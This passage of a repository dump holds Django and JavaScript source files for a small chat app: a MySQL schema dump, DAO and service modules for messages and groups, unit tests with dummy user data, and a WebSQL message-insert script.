auth_user\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_user`;\nCREATE TABLE `auth_user` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `password` varchar(128) NOT NULL,\n `last_login` datetime NOT NULL,\n `is_superuser` tinyint(1) NOT NULL,\n `username` varchar(30) NOT NULL,\n `first_name` varchar(30) NOT NULL,\n `last_name` varchar(30) NOT NULL,\n `email` varchar(75) NOT NULL,\n `is_staff` tinyint(1) NOT NULL,\n `is_active` tinyint(1) NOT NULL,\n `date_joined` datetime NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `username` (`username`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_user\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_user_groups\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_user_groups`;\nCREATE TABLE `auth_user_groups` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_id` int(11) NOT NULL,\n `group_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `user_id` (`user_id`,`group_id`),\n KEY `auth_user_groups_e8701ad4` (`user_id`),\n KEY `auth_user_groups_0e939a4f` (`group_id`),\n CONSTRAINT `auth_user_groups_group_id_30a071c9_fk_auth_group_id` FOREIGN KEY (`group_id`) REFERENCES `auth_group` (`id`),\n CONSTRAINT `auth_user_groups_user_id_24702650_fk_auth_user_id` FOREIGN KEY (`user_id`) REFERENCES `auth_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_user_groups\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_user_user_permissions\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_user_user_permissions`;\nCREATE TABLE `auth_user_user_permissions` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_id` int(11) NOT NULL,\n `permission_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `user_id` (`user_id`,`permission_id`),\n KEY `auth_user_user_permissions_e8701ad4` (`user_id`),\n KEY `auth_user_user_permissions_8373b171` (`permission_id`),\n CONSTRAINT `auth_user_user_perm_permission_id_3d7071f0_fk_auth_permission_id` FOREIGN KEY (`permission_id`) REFERENCES `auth_permission` (`id`),\n CONSTRAINT `auth_user_user_permissions_user_id_7cd7acb6_fk_auth_user_id` FOREIGN KEY (`user_id`) REFERENCES `auth_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_user_user_permissions\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for django_admin_log\n-- ----------------------------\nDROP TABLE IF EXISTS `django_admin_log`;\nCREATE TABLE `django_admin_log` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `action_time` datetime NOT NULL,\n `object_id` longtext,\n `object_repr` varchar(200) NOT NULL,\n `action_flag` smallint(5) unsigned NOT NULL,\n `change_message` longtext NOT NULL,\n `content_type_id` int(11) DEFAULT NULL,\n `user_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `django_admin_log_417f1b1c` (`content_type_id`),\n KEY `django_admin_log_e8701ad4` (`user_id`),\n CONSTRAINT `django_admin_log_user_id_1c5f563_fk_auth_user_id` FOREIGN KEY (`user_id`) REFERENCES `auth_user` (`id`),\n CONSTRAINT `django_admin__content_type_id_5151027a_fk_django_content_type_id` FOREIGN KEY (`content_type_id`) REFERENCES `django_content_type` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of django_admin_log\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for django_content_type\n-- ----------------------------\nDROP TABLE IF EXISTS `django_content_type`;\nCREATE TABLE `django_content_type` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(100) NOT NULL,\n `app_label` varchar(100) NOT NULL,\n `model` varchar(100) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `django_content_type_app_label_3ec8c61c_uniq` (`app_label`,`model`)\n) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of django_content_type\n-- ----------------------------\nINSERT INTO `django_content_type` VALUES ('1', 'log entry', 'admin', 'logentry');\nINSERT INTO `django_content_type` VALUES ('2', 'permission', 'auth', 'permission');\nINSERT INTO `django_content_type` VALUES ('3', 'group', 'auth', 'group');\nINSERT INTO `django_content_type` VALUES ('4', 'user', 'auth', 'user');\nINSERT INTO `django_content_type` VALUES ('5', 'content type', 'contenttypes', 'contenttype');\nINSERT INTO `django_content_type` VALUES ('6', 'session', 'sessions', 'session');\nINSERT INTO `django_content_type` VALUES ('7', 'user', 'adam2014', 'user');\nINSERT INTO `django_content_type` VALUES ('8', 'group', 'adam2014', 'group');\nINSERT INTO `django_content_type` VALUES ('9', 'message', 'adam2014', 'message');\nINSERT INTO `django_content_type` VALUES ('10', 'text message', 'adam2014', 'textmessage');\nINSERT INTO `django_content_type` VALUES ('11', 'picture message', 'adam2014', 'picturemessage');\nINSERT INTO `django_content_type` VALUES ('12', 'voice message', 'adam2014', 'voicemessage');\nINSERT INTO `django_content_type` VALUES ('13', 'location message', 'adam2014', 'locationmessage');\nINSERT INTO `django_content_type` VALUES ('14', 'bottle picture', 'adam2014', 'bottlepicture');\nINSERT INTO `django_content_type` VALUES ('15', 'immediately message', 'adam2014', 'immediatelymessage');\nINSERT INTO `django_content_type` VALUES ('16', 'add friend', 'adam2014', 'addfriend');\nINSERT INTO `django_content_type` VALUES ('17', 'friend relation', 'adam2014', 'friendrelation');\nINSERT INTO `django_content_type` VALUES ('18', 'group relation', 'adam2014', 'grouprelation');\nINSERT INTO `django_content_type` VALUES ('19', 'group message', 'adam2014', 'groupmessage');\n\n-- ----------------------------\n-- Table structure for django_migrations\n-- ----------------------------\nDROP TABLE IF EXISTS `django_migrations`;\nCREATE TABLE `django_migrations` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `app` varchar(255) NOT NULL,\n `name` varchar(255) NOT NULL,\n `applied` datetime NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of django_migrations\n-- ----------------------------\nINSERT INTO `django_migrations` VALUES ('1', 'adam2014', '0001_initial', '2014-11-11 06:08:02');\nINSERT INTO `django_migrations` VALUES ('2', 'contenttypes', '0001_initial', '2014-11-11 06:08:02');\nINSERT INTO `django_migrations` VALUES ('3', 'auth', '0001_initial', '2014-11-11 06:08:03');\nINSERT INTO `django_migrations` VALUES ('4', 'admin', '0001_initial', '2014-11-11 06:08:03');\nINSERT INTO `django_migrations` VALUES ('5', 'sessions', '0001_initial', '2014-11-11 06:08:03');\n\n-- ----------------------------\n-- Table structure for django_session\n-- ----------------------------\nDROP TABLE IF EXISTS `django_session`;\nCREATE TABLE `django_session` (\n `session_key` varchar(40) NOT NULL,\n `session_data` longtext NOT NULL,\n `expire_date` datetime NOT NULL,\n PRIMARY KEY (`session_key`),\n KEY `django_session_de54fa62` (`expire_date`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of django_session\n-- ----------------------------\n"
},
{
"alpha_fraction": 0.7632978558540344,
"alphanum_fraction": 0.7752659320831299,
"avg_line_length": 24.89655113220215,
"blob_id": "07ecf637fc5c5c77e2678c5f26dcec39bab3b735",
"content_id": "a55222be23f4be113b0fd8ff63520b99878e6160",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 752,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 29,
"path": "/zzc/adam2014/Service/GroupRelationService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import GroupRelation\nfrom adam2014.DAO import GroupRelationDAO\n\ndef newGroupRelation(**groupRelation):\n g = GroupRelationDAO.insertGroupRelation(**groupRelation)\n return g;\n\ndef deleteGroupRelation(id):\n GroupRelationDAO.deleteGroupRelation(id)\n\ndef deleteGroupRelationByCondition(user_id,group_id):\n GroupRelationDAO.deleteGroupRelation(user_id=user_id,group_id=group_id)\n\ndef getGroupRelationById(id):\n g = GroupRelationDAO.getGroupRelationById(id)\n return g;\n\ndef updateGroupRelation(**groupRelation):\n GroupRelationDAO.updateGroupRelation(**groupRelation)\n\n"
},
{
"alpha_fraction": 0.6125311255455017,
"alphanum_fraction": 0.6842343211174011,
"avg_line_length": 45.04166793823242,
"blob_id": "1925ce7f1e77d8537e945b92e2acf86851605004",
"content_id": "b30e2af2661d24497cdc8e614fbc438944e8b95d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4885,
"license_type": "no_license",
"max_line_length": 216,
"num_lines": 96,
"path": "/zzc/adam2014/AllTest/DAOTest/testUserDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'lao605'\n\nfrom django.test import TestCase\nfrom adam2014.DAO.UserDAO import *\nfrom adam2014.models import User\n\n\n# If your tests rely on database access such as creating or querying models, \n# be sure to create your test classes as subclasses of django.test.TestCase rather than unittest.TestCase.\n# Create your tests here.\n# you can simulate requests, insert test data, inspect your application’s output and generally verify your code is doing what it should be doing.\n\n# from django.test import TestCase\n# from myapp.models import Animal\n\n# class AnimalTestCase(TestCase):\n# def setUp(self):\n# Animal.objects.create(name=\"lion\", sound=\"roar\")\n# Animal.objects.create(name=\"cat\", sound=\"meow\")\n\n# def test_animals_can_speak(self):\n# \"\"\"Animals that can speak are correctly identified\"\"\"\n# lion = Animal.objects.get(name=\"lion\")\n# cat = Animal.objects.get(name=\"cat\")\n# self.assertEqual(lion.speak(), 'The lion says \"roar\"')\n# self.assertEqual(cat.speak(), 'The cat says \"meow\"')\n\n# 怎么测试DAO\n# 增加->查->修改->删除\n\n# filter和get有什么不同\n# get不存在的会报错,filter不存在的不会报错\n# get得到的是对象,filter得到的是结果集\n\n# However, a big part of the time taken to run a Django TestCase is consumed by the call to flush that ensures that you have a clean database at the start of each test run. \n# django为我们在setting文件中database列出的每个数据库对应设置一个测试数据库\n# 每个test开始的时候都会有一个全新的数据库(包含setUp的数据),执行test很大的一个时间开支用在flush数据库\n\n# 每个DAO一个类去测试\nclass UserDAOTest(TestCase):\n def setUp(self):\n # 约定:假定django框架所给的都是值得信赖的\n # 约定:下面的测试函数可以使用上面测试过的函数\n # 约定:一个测试函数不可以使用另外一个测试函数新加的变量,只使用setup中设置的变量\n # 测试中要用到的全局在setUp这里设置\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111112\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n \n\n # 加了之后的数量减去加了之前的数量等于1\n def test_insertUser(self):\n user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank3\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111113\"}\n before = len(User.objects.all())\n insertUser(**user3)\n after = len(User.objects.all())\n self.assertEqual(after-before,1)\n \n def test_getUserById(self):\n self.assertEqual(getUserById(1).id,1)\n self.assertEqual(getUserById(2).id,2)\n\n def test_updateUser(self):\n modified_user = {\"id\":1,\"password\":\"changed_password\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"auto_generating_code\"}\n updateUser(**modified_user)\n self.assertEqual(getUserById(1).password,\"changed_password\")\n\n def test_deleteUser(self):\n deleteUser(1)\n deleteUser(2)\n self.assertEqual(len(User.objects.filter(id=1)), 0)\n self.assertEqual(len(User.objects.filter(id=2)), 0)\n\n def test_getUserByCode(self):\n self.assertEqual(getUserByCode(\"111111111\").id,1)\n self.assertEqual(getUserByCode(\"111111112\").id,2)\n\n def test_validateByPhone(self):\n self.assertEqual(validateUserByPhone(\"111111111\",\"7654321\"),True )\n self.assertEqual(validateUserByPhone(\"111111111\",\"1234567\"),False )\n self.assertEqual(validateUserByPhone(\"111111112\",\"1234567\"),True )\n self.assertEqual(validateUserByPhone(\"111111112\",\"7654321\"),False )\n self.assertEqual(validateUserByPhone(\"13570517280\",\"whatever\"),False )\n self.assertEqual(validateUserByPhone(\"13570517281\",\"whatever\"),False )\n\n def test_validateByCode(self):\n self.assertEqual(validateUserByCode(\"111111111\",\"7654321\"),True )\n self.assertEqual(validateUserByCode(\"111111112\",\"1234567\"),True )\n self.assertEqual(validateUserByCode(\"111111111\",\"1234567\"),False )\n self.assertEqual(validateUserByCode(\"111111112\",\"7654321\"),False )\n self.assertEqual(validateUserByCode(\"111111113\",\"whatever\"),False )\n self.assertEqual(validateUserByCode(\"111111114\",\"whatever\"),False )\n\n"
},
{
"alpha_fraction": 0.7256532311439514,
"alphanum_fraction": 0.735154390335083,
"avg_line_length": 26.19354820251465,
"blob_id": "624a183b19bff9006713e488a6430393836b814f",
"content_id": "6c140444c2e87569bfd7669a3ccd07554edc4cfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 842,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 31,
"path": "/zzc/adam2014/DAO/ImmediatelyMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import ImmediatelyMessage\n# class ImmediatelyMessage(models.Model):\n# user_from = models.ForeignKey(User)\n# message = models.ForeignKey(Message)\n# user_to_id = models.IntegerField()\n# time = models.DateTimeField()\n# type = models.IntegerField()\n\ndef insertImmediatelyMessage(**immediatelyMessage):\n i = ImmediatelyMessage.objects.create(**immediatelyMessage)\n return i;\n\n\ndef deleteImmediatelyMessage(id):\n ImmediatelyMessage.objects.get(id=id).delete()\n\ndef getImmediatelyMessageById(id):\n return ImmediatelyMessage.objects.get(id=id)\n\n\ndef updateImmediatelyMessage(**kw):\n ImmediatelyMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.7046154141426086,
"alphanum_fraction": 0.7169230580329895,
"avg_line_length": 22.178571701049805,
"blob_id": "e3758fb0c5b70e333f62d4471b203bf9c780ab56",
"content_id": "8ce6399f407dd98481f647344699bc3f070315f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 650,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 28,
"path": "/zzc/adam2014/DAO/TextMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import TextMessage\n# class TextMessage(models.Model):\n# message = models.ForeignKey(Message,null=True)\n# content = models.TextField()\n\n\ndef insertTextMessage(**textMessage):\n t = TextMessage.objects.create(**textMessage)\n return t\n\n\ndef deleteTextMessage(id):\n TextMessage.objects.get(id=id).delete()\n\ndef getTextMessageById(id):\n return TextMessage.objects.get(id=id)\n\ndef updateTextMessage(**kw):\n TextMessage.objects.filter(id=kw['id']).update(**kw)\n\n"
},
{
"alpha_fraction": 0.6935749650001526,
"alphanum_fraction": 0.7108731269836426,
"avg_line_length": 27.186046600341797,
"blob_id": "24e9687185815fe8d66997a25cf9c669a7577cf7",
"content_id": "da3c02ae4aae1f248ab036558b380abfce0a320c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1214,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 43,
"path": "/zzc/adam2014/DAO/BottlePictureDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import BottlePicture\nfrom django.db import connection\n# class BottlePicture(models.Model):\n# usedTimes = models.IntegerField()\n# tookTime = models.DateTimeField()\n# user = models.ForeignKey(User,null=True)\n# author = models.CharField(max_length=32,null=True)\n# content = models.TextField(max_length=90)\n# longitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n# latitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n\ndef insertBottlePicture(**bottlePicture):\n b = BottlePicture.objects.create(**bottlePicture)\n return b;\n\ndef deleteBottlePicture(id):\n BottlePicture.objects.get(id=id).delete()\n\ndef getBottlePictureById(id):\n return BottlePicture.objects.get(id=id)\n\ndef updateBottlePicture(**kw):\n BottlePicture.objects.filter(id=kw['id']).update(**kw)\n\n\n\ndef maxId():\n sql = \"SELECT MAX(id) FROM adam2014_BottlePicture\"\n cursor = connection.cursor()\n cursor.execute(sql)\n row = cursor.fetchone()\n #row = cursor.fetchall()\n return row[0]\n\n\n"
},
{
"alpha_fraction": 0.7369726896286011,
"alphanum_fraction": 0.7444168925285339,
"avg_line_length": 33.57143020629883,
"blob_id": "bbe4640416b1753d6779a4768ede3615361cbdee",
"content_id": "e9535c98eb767f60c0a4ffa77b9dcc494be96482",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1219,
"license_type": "permissive",
"max_line_length": 172,
"num_lines": 35,
"path": "/Distance/js/main_insert_message_sql.js",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "//打开数据库\nvar db = openDatabase('localdb', '', 'local database', 204800);\nfunction insertMessage(user_from_id,to_id,content_type,type,content){\n\n\tvar newDate = new Date();\n\tvar currentYear=newDate.getFullYear();\n\tvar currentMonth=newDate.getMonth()+1;\n\tvar currentDate=newDate.getDate();\n\tvar currentHour=newDate.getHours();\n\tvar currentMinute=newDate.getMinutes();\n\tvar currentSecond=newDate.getSeconds();\n\tvar currentDateTime=currentYear+\"-\"+currentMonth+\"-\"+currentDate+\" \"+currentHour+\":\"+currentMinute+\":\"+currentSecond;\n\t\ndb.transaction(function(tx){\n\ttx.executeSql('insert into message values (?,?,?,?,?,?)',[user_from_id,to_id,currentDateTime,content_type,type,content],onInsertSuccess,onInsertError);\n\ttx.executeSql('update messageList set time = ? where user_from_id = ? and to_id = ? and type = ?',[currentDateTime,user_from_id,to_id,type],onUpdateSuccess,onUpdateError);\n})\n}\nfunction onInsertSuccess(tx,rs)\n{\n\tconsole.log(\"Insert successfully\");\n}\nfunction onInsertError(tx,error)\n{\n\tconsole.log(error.message);\n}\nfunction onUpdateSuccess(tx,rs)\n{\n\tconsole.log(\"Update successfully\");\n}\nfunction onUpdateError(tx,error)\n{\n\tconsole.log(error.message);\n}\n//insertMessage(1,2,\"text\",\"contact\",\"hehe\");"
},
{
"alpha_fraction": 0.6025878190994263,
"alphanum_fraction": 0.6288354992866516,
"avg_line_length": 32,
"blob_id": "d7343ed57a9a21cade13b966994aab23bfaa7a40",
"content_id": "8b62177300b5a7088701c01864bd274fc0785663",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2721,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 82,
"path": "/zzc/adam2014/AllTest/DAOTest/testTextMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'Joe'\n\nfrom django.test import TestCase\nfrom adam2014.DAO.TextMessageDAO import *\nfrom adam2014.models import TextMessage\nfrom adam2014.models import Message\n\nclass TestMessageDAOTest(TestCase):\n\n def setUp(self):\n\n # 文字\n self.message1 = {\"id\": 1, \"type\": \"1\", \"content_id\": \"1\"}\n # 图片\n self.message2 = {\"id\": 2, \"type\": \"2\", \"content_id\": \"2\"}\n # 语音\n self.message3 = {\"id\": 3, \"type\": \"3\", \"content_id\": \"3\"}\n # 位置\n self.message4 = {\"id\": 4, \"type\": \"4\", \"content_id\": \"4\"}\n\n self.message1 = Message.objects.create(**self.message1)\n self.message2 = Message.objects.create(**self.message2)\n self.message3 = Message.objects.create(**self.message3)\n self.message4 = Message.objects.create(**self.message4)\n\n self.text_message1 = {\"id\": 1, \"message\": self.message1, \"content\": \"I am a boy\"}\n self.text_message2 = {\"id\": 2, \"message\": self.message2, \"content\": \"I am a girl\"}\n self.text_message3 = {\"id\": 3, \"message\": self.message3, \"content\": \"I am not a boy or a girl\"}\n\n self.text_message1 = TextMessage.objects.create(**self.text_message1)\n self.text_message2 = TextMessage.objects.create(**self.text_message2)\n self.text_message3 = TextMessage.objects.create(**self.text_message3)\n\n def testInsertTextMessage(self):\n\n text_message4 = {\"id\": 4, \"message\": self.message4, \"content\": \"I am a freak\"}\n\n before = len(TextMessage.objects.all())\n print \"testInsertTextMessage before: \"\n print(TextMessage.objects.all())\n\n insertTextMessage(**text_message4)\n\n after = len(TextMessage.objects.all())\n print \"testInsertTextMessage after: \"\n print(TextMessage.objects.all())\n\n self.assertEqual(after-before, 1)\n\n def testDeleteTextMessage(self):\n\n print \"deleteTextMessage before:\"\n print len(TextMessage.objects.all())\n\n deleteTextMessage(1)\n deleteTextMessage(2)\n deleteTextMessage(3)\n\n print \"deleteTextMessage after:\"\n print len(TextMessage.objects.all())\n\n def testGetTextMessage(self):\n\n print(\"testGetTextMessageById 1&2:\")\n self.assertEqual(getTextMessageById(1).id, 1)\n print(getTextMessageById(1))\n self.assertEqual(getTextMessageById(2).id, 2)\n print(getTextMessageById(2))\n\n def testUpdateTextMessageById(self):\n\n print \"Before update: \"\n print getTextMessageById(1)\n\n text_message = getTextMessageById(1)\n text_message.content = \"hello, am i handsome\"\n\n text_message.save()\n\n print \"After update: \"\n print getTextMessageById(1)"
},
{
"alpha_fraction": 0.7026712894439697,
"alphanum_fraction": 0.7119628190994263,
"avg_line_length": 25.121212005615234,
"blob_id": "b356ded0266d6ecdb4bb0fd886a62859d91d2556",
"content_id": "52dc148e040324c88604ae9df1dc9983d6c22a9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 861,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 33,
"path": "/zzc/adam2014/DAO/MessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import Message\n# class Message(models.Model):\n# time = models.DateTimeField()\n# type = models.IntegerField()\n# content_id = models.IntegerField()\n# users = models.ManyToManyField(User,through='ImmediatelyMessage')\n# groups = models.ManyToManyField(Group,through='GroupMessage')\n\ndef insertMessage(**message):\n m = Message.objects.create(**message)\n return m;\n\ndef deleteMessage(id):\n Message.objects.get(id=id).delete()\n\ndef getMessageById(id):\n return Message.objects.get(id=id)\n\ndef getMessageByContentId(content_id):\n return Message.objects.filter(content_id=content_id)\n\ndef updateMessage(**kw):\n Message.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.6550801992416382,
"alphanum_fraction": 0.6684492230415344,
"avg_line_length": 18.6842098236084,
"blob_id": "2a8dde1ea7121c06e6fd9bd6faf6c465f13c0578",
"content_id": "77e9527d07032d25f0c1f40e9374b98ea4dfd319",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 19,
"path": "/zzc/adam2014/Service/JoinService/User_groupService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.DAO.JoinDAO import User_groupDAO\n\ndef getUser_groups(user_id):\n user_groups = []\n try:\n user_groups = User_groupDAO.getGroup_userListView(user_id)\n\n except:\n pass\n return user_groups\n"
},
{
"alpha_fraction": 0.5147058963775635,
"alphanum_fraction": 0.5160427689552307,
"avg_line_length": 33.04545593261719,
"blob_id": "47fb40c5521c6eb934134c713e39086cb7cd8fdf",
"content_id": "1c57a5d616ca1c44aeb2024fcfa9f461b67fe7f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 748,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 22,
"path": "/zzc/adam2014/JoinModels/User_group.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\nclass User_group(object):\n def __init__(self,id,time,group_id,name,ucount,code,create_id):\n self.id = id\n self.group_id = group_id\n self.time = time\n self.name = name\n self.ucount = ucount\n self.code = code\n self.create_id = create_id\n\n def printout(self):\n print(\"id: \"+str(self.id)+\" group_id: \"+str(self.group_id)+\" time \"+str(self.time)\n +\" name: \"+str(self.name)+\" ucount: \"+str(self.ucount)\n +\" code: \"+str(self.code)+' create_id: '+str(self.create_id))\n\n def object2dict(obj):\n d = {}\n #d['__class__'] = obj.__class__.__name__\n #d['__module__'] = obj.__module__\n d.update(obj.__dict__)\n return d"
},
{
"alpha_fraction": 0.6944444179534912,
"alphanum_fraction": 0.7108585834503174,
"avg_line_length": 19.710525512695312,
"blob_id": "b874244e1059a8e63b53044430cb689417aa5958",
"content_id": "f361c22512a349229e596683bdeabf944842999a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 792,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 38,
"path": "/zzc/adam2014/Service/GroupService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import User\nfrom adam2014.models import Group\nfrom adam2014.DAO import GroupDAO\n\n\ndef newGroup(**group):\n g = GroupDAO.insertGroup(**group)\n return g;\n\ndef deleteGroup(id):\n GroupDAO.deleteGroup(id=id)\n\ndef getGroupById(id):\n return GroupDAO.getGroupById(id=id)\n\ndef getGroupByCode(code):\n return GroupDAO.getGroupByCode(code=code)\n\ndef updateGroup(**group):\n GroupDAO.updateGroup(**group)\n\ndef getGroup_Users(id):\n users = Group.objects.get(id=id).users.all()\n return users\n\ndef getGroup_UsersByCondition(id,**user):\n users = Group.objects.get(id=id).users.filter(**user)\n return users\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7061224579811096,
"alphanum_fraction": 0.7170068025588989,
"avg_line_length": 24.379310607910156,
"blob_id": "b51351b8f71e42b4b79d779f3a5ea96b5f011922",
"content_id": "8d49cc912d2abb6570700ea2950821729158868b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 735,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 29,
"path": "/zzc/adam2014/DAO/GroupMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import GroupMessage\n\n# class GroupMessage(models.Model):\n# user_from = models.ForeignKey(User)\n# message = models.ForeignKey(Message)\n# group_to = models.ForeignKey(Group)\n# time = models.DateTimeField()\n\ndef insertGroupMessage(**groupMessage):\n g = GroupMessage.objects.create(**groupMessage)\n return g;\n\ndef deleteGroupMessage(id):\n GroupMessage.objects.get(id=id).delete()\n\ndef getGroupMessageById(id):\n return GroupMessage.objects.get(id=id)\n\ndef updateGroupMessage(**kw):\n GroupMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.6056177616119385,
"alphanum_fraction": 0.645663321018219,
"avg_line_length": 42.858333587646484,
"blob_id": "4d610abb8a4eb0c235c49b97854fdb4064cc8a59",
"content_id": "a08c110bf56494d85ea89e9fd511228992115a55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5413,
"license_type": "no_license",
"max_line_length": 209,
"num_lines": 120,
"path": "/zzc/adam2014/AllTest/DAOTest/testGroupMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
